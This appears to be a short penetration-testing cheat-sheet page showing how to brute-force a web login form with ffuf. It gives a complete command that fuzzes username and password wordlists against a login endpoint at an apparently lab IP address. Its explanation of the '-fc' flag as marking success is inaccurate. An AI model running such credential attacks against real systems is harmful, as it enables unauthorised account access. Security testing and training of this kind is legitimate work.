.. / ffuf_brute_force
Star

Example dictionary attack with ffuf.

Command Reference:

Target_url: The target url to fuzz on

Wordlist: Wordlist to use for directory busting

w: wordlist parameter

u: url parameter

H: Custom header

X: HTTP method

fc: Status code to indicate success

d: Data to send with the post request

W1: Usernames to fuzz

W2: Passwords to fuzz

Command:

ffuf -w <wordlist_usernames>:W1,<wordlist_passwords>:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.120.213/customers/login -fc 200

References:

https://github.com/ffuf/ffuf

.. / ffuf_brute_force Star if(localStorage["style"]=="true"){ document.getElementById('pagestyle').setAttribute('href','/assets/styleDark.css'); document.querySelector('input[type="checkbox"]').checked = true }

.. / ffuf_brute_force
Star